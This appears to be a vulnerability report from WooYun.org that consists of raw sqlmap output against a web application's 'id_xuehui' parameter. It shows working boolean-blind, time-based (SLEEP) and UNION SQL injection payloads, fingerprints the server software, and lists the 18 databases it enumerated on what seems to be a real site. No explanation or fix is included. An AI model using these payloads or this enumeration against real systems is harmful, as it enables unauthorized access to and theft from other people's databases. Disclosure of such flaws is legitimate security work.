WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id_xuehui (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id_xuehui=55 AND 3121=3121
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id_xuehui=55 AND (SELECT * FROM (SELECT(SLEEP(5)))Yxlt)
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: id_xuehui=-9911 UNION ALL SELECT NULL,NULL,CONCAT(0x7170787a71,0x58634250786956664e6c,0x717a78
---
[23:39:37] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.12
[23:39:37] [INFO] fetching database names
[23:39:38] [INFO] the SQL query used returns 18 entries
[23:39:38] [INFO] resumed: information_schema
[23:39:38] [INFO] resumed: blog
[23:39:38] [INFO] resumed: claroline
[23:39:38] [INFO] resumed: cxzyzl
[23:39:38] [INFO] resumed: dr
[23:39:38] [INFO] resumed: family
[23:39:38] [INFO] resumed: forum
[23:39:38] [INFO] resumed: guestbook
[23:39:38] [INFO] resumed: icmip11
[23:39:38] [INFO] resumed: keylab
[23:39:38] [INFO] resumed: manager
[23:39:38] [INFO] resumed: mysql
[23:39:38] [INFO] resumed: news
[23:39:38] [INFO] resumed: syxy
[23:39:38] [INFO] resumed: test
[23:39:38] [INFO] resumed: vote
[23:39:38] [INFO] resumed: xydbase
[23:39:38] [INFO] resumed: xysys
available databases [18]:
[*] blog
[*] claroline
[*] cxzyzl
[*] dr
[*] family
[*] forum
[*] guestbook
[*] icmip11
[*] information_schema
[*] keylab
[*] manager
[*] mysql
[*] news
[*] syxy
[*] test
[*] vote
[*] xydbase
[*] xysys